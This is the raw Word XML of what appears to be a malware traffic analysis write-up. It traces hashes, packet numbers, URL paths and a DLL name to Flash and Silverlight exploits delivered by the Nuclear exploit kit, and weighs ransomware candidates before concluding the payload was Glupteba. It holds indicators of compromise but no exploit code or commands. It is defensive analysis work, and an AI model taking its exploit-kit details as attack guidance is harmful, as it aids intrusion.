        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB22D3" w14:textId="77777777" w:rsidR="00C32455" w:rsidRPr="00BF2E60" w:rsidRDefault="001057C7" w:rsidP="00C32455">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF2E60">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">VT references </w:t>
      </w:r>
      <w:r w:rsidR="00BF2E60" w:rsidRPr="00BF2E60">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>that this hash has executable file</w:t>
      </w:r>
      <w:r w:rsidR="00B11DAE">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> (.exe)</w:t>
      </w:r>
      <w:r w:rsidR="00BF2E60" w:rsidRPr="00BF2E60">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> properties.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2E60">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="0069105D" w:rsidRPr="00BF2E60">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB49BA">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>The payloads in packets 2658 and 2798 would use an executable.</w:t>
      </w:r>
      <w:r w:rsidR="000E78E6">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7673BA49" w14:textId="77777777" w:rsidR="00C32455" w:rsidRPr="00C32455" w:rsidRDefault="00C32455" w:rsidP="00C32455">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BE8738" w14:textId="77777777" w:rsidR="00732326" w:rsidRPr="00C32455" w:rsidRDefault="00732326" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32455">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>HASH</w:t>
      </w:r>
      <w:r w:rsidR="00C32455">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> in TCP Stream 55</w:t>
      </w:r>
      <w:r w:rsidRPr="00C32455">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00887510">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>d9f266eb1dbd2bca408c837c3c4eaa39135417649ace63ba20d58c2df88ea19f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38563D32" w14:textId="77777777" w:rsidR="00C32455" w:rsidRPr="0077542C" w:rsidRDefault="0077542C" w:rsidP="0077542C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>VT references a</w:t>
      </w:r>
      <w:r w:rsidR="00E549F5">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>n html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> filename </w:t>
      </w:r>
      <w:r w:rsidR="0084797A" w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0084797A" w:rsidRPr="00C32455">
        <w:rPr>
          <w:i/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:r w:rsidR="0084797A" w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBEDED"/>
        </w:rPr>
        <w:t>/VQlXBEpVSwQ.html”</w:t>
      </w:r>
      <w:r w:rsidR="0084797A">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBEDED"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">associated with this hash that </w:t>
      </w:r>
      <w:r w:rsidR="0084797A">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>appears to be used as part of the pointer in packet 2611 and appears to be available on the landing page in packet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2561</w:t>
      </w:r>
      <w:r w:rsidR="0084797A">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F767670" w14:textId="77777777" w:rsidR="00C32455" w:rsidRPr="00C32455" w:rsidRDefault="00C32455" w:rsidP="00C32455">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EAA8745" w14:textId="77777777" w:rsidR="00732326" w:rsidRPr="00C32455" w:rsidRDefault="00732326" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32455">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>HASH</w:t>
      </w:r>
      <w:r w:rsidR="00C32455">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> in TCP Stream 55</w:t>
      </w:r>
      <w:r w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidRPr="0084797A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>c4b1c55a90877d0618c2dc8bad01b33f1d60f3613b3673bdb08465569bdb8236</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F144113" w14:textId="77777777" w:rsidR="00C32455" w:rsidRDefault="00C32455" w:rsidP="00682A58">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Per VT this hash is associated with exploit and malware text files</w:t>
      </w:r>
      <w:r w:rsidR="0084797A">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="0084797A">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00162FF6">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>acket 2617 contained a</w:t>
      </w:r>
      <w:r w:rsidR="0084797A">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flash</w:t>
      </w:r>
      <w:r w:rsidR="00162FF6">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57115C07" w14:textId="77777777" w:rsidR="00BF50FB" w:rsidRPr="00C32455" w:rsidRDefault="00162FF6" w:rsidP="00682A58">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>VT references a filename associated with this hash – that filename matches the one in the  “</w:t>
      </w:r>
      <w:r w:rsidR="00732326" w:rsidRPr="00C32455">
        <w:rPr>
          <w:i/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:r w:rsidR="00732326" w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00732326" w:rsidRPr="00C32455">
        <w:rPr>
          <w:i/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>B0hCSgFdUgdNBhhTTAMCBFAHAQIGXFJMAAcESgQNHwZTUh4HBUoCWwc</w:t>
      </w:r>
      <w:r w:rsidR="00732326" w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>in packet 261</w:t>
      </w:r>
      <w:r w:rsidR="0084797A">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00732326" w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5004687C" w14:textId="77777777" w:rsidR="00732326" w:rsidRDefault="00162FF6" w:rsidP="00682A58">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">VT references a </w:t>
      </w:r>
      <w:r w:rsidR="00732326" w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">filename </w:t>
      </w:r>
      <w:r w:rsidR="00BF50FB" w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00732326" w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>79e2</w:t>
      </w:r>
      <w:r w:rsidR="00BF50FB" w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00732326" w:rsidRPr="00C32455">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">associated with this hash – that filename matches the one in </w:t>
      </w:r>
      <w:r w:rsidRPr="00162FF6">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidR="0084797A">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162FF6">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>2617.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429451F" w14:textId="77777777" w:rsidR="002C35F9" w:rsidRPr="00162FF6" w:rsidRDefault="002C35F9" w:rsidP="00682A58">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Several engines in VT identify this </w:t>
      </w:r>
      <w:r w:rsidR="007410EF">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">detected as an “Exploit.CVE-2015-0311”.  That CVE is for a vulnerability in Adobe Flash Player and allows remote attackers to execute arbitrary code (ref: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2015-0311</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4D9B90" w14:textId="77777777" w:rsidR="00C32455" w:rsidRPr="00211AFD" w:rsidRDefault="00C32455" w:rsidP="00C32455">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1255D355" w14:textId="77777777" w:rsidR="00BF50FB" w:rsidRDefault="00732326" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF50FB">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>HASH</w:t>
      </w:r>
      <w:r w:rsidR="00C32455">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> in TCP Stream 56</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF50FB">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidRPr="0084797A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>b4cb839573156364fc2a10a2d0a57cced697f076ce9fe4aa3604ada0b7a77523</w:t>
      </w:r>
      <w:r w:rsidR="00BF50FB">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01992C90" w14:textId="77777777" w:rsidR="007410EF" w:rsidRDefault="007410EF" w:rsidP="007410EF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Per VT this hash is associated with exploit and malware text files for ZIP files.  Packet 2634 and 2798 contained a ZIP file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4F4B21" w14:textId="77777777" w:rsidR="00162FF6" w:rsidRDefault="00162FF6" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>VT references a “.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">” called </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF50FB">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>“advfgrwqrefq32.dll”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> associated with this hash – that filename matches one found in the contents of packets 2634.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39022162" w14:textId="77777777" w:rsidR="007410EF" w:rsidRDefault="007410EF" w:rsidP="00732326">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">Some engines in VT identify this hash detected as an “Exploite.CVE-2013.0074.t”  That CVE is for a vulnerability in Silverlight that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>allos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> remote attackers to execute arbitrary code (ref: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2013-0074</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C77D4D" w14:textId="77777777" w:rsidR="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1EBE7F" w14:textId="77777777" w:rsidR="00662158" w:rsidRDefault="00662158" w:rsidP="00662158">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7F11F0" w14:textId="77777777" w:rsidR="00F90012" w:rsidRDefault="00F90012" w:rsidP="000A517A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="355A79"/>
          <w:spacing w:val="8"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAEA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68DFEB24" w14:textId="77777777" w:rsidR="00BF2E60" w:rsidRDefault="00BF2E60" w:rsidP="00BF2E60">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>TYPE OF MALWARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714CC4CD" w14:textId="77777777" w:rsidR="00FB49BA" w:rsidRDefault="00FB49BA" w:rsidP="00BF2E60">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2926EEED" w14:textId="77777777" w:rsidR="00FB49BA" w:rsidRPr="00FB49BA" w:rsidRDefault="00FB49BA" w:rsidP="00BF2E60">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB49BA">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>MALWARE PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8B6B7" w14:textId="77777777" w:rsidR="00A55CFB" w:rsidRPr="003210AF" w:rsidRDefault="00FB49BA" w:rsidP="00FB49BA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malware </w:t>
      </w:r>
      <w:r w:rsidR="00A55CFB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">payload was most likely one of these ransomware varieties that were known to be used by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A55CFB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A55CFB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nuclear in 2015</w:t>
      </w:r>
      <w:r w:rsidR="00A55CFB" w:rsidRPr="003210AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003210AF" w:rsidRPr="003210AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  It was actually </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003210AF" w:rsidRPr="003210AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Glupteba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003210AF" w:rsidRPr="003210AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is one I originally had on the list, but then discounted) vs. any of the ones below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4476624C" w14:textId="77777777" w:rsidR="002D0AAC" w:rsidRDefault="00A55CFB" w:rsidP="00955F57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Cryptowall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="002D0AAC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>most likely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5D2F5" w14:textId="77777777" w:rsidR="00955F57" w:rsidRPr="00955F57" w:rsidRDefault="00A55CFB" w:rsidP="002D0AAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>the most active ransomware family</w:t>
      </w:r>
      <w:r w:rsidR="00955F57">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> in 2015</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AB035" w14:textId="77777777" w:rsidR="00955F57" w:rsidRDefault="00955F57" w:rsidP="00955F57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Alias: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00955F57">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Cryptowall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00955F57">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, Trojan:W32/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00955F57">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Cryptowall.A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5966CBBA" w14:textId="77777777" w:rsidR="002D0AAC" w:rsidRDefault="002D0AAC" w:rsidP="00955F57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>One of the AV engines detected “</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0AAC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Trojan.Win32.Crypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>” for the hash “</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0AAC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>9d4843ea3f0b0be3b533b50b17e8c1d2460e7136f7a46b4700ea5eb596629d7d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A27CAE" w14:textId="77777777" w:rsidR="00A55CFB" w:rsidRDefault="00A55CFB" w:rsidP="00A55CFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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TeslaCrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D0AAC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> – less likely as it was more commonly distributed by Angler EK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F95FE73" w14:textId="77777777" w:rsidR="002D0AAC" w:rsidRPr="002D0AAC" w:rsidRDefault="002D0AAC" w:rsidP="002D0AAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CTB-Locker – possible, but not as commonly used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F3016" w14:textId="77777777" w:rsidR="00A55CFB" w:rsidRDefault="00A55CFB" w:rsidP="00A55CFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Troldesh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D0AAC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> – less likely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F47935" w14:textId="77777777" w:rsidR="00955F57" w:rsidRPr="00A55CFB" w:rsidRDefault="00955F57" w:rsidP="00A55CFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Browlock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D0AAC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> – less likely</w:t>
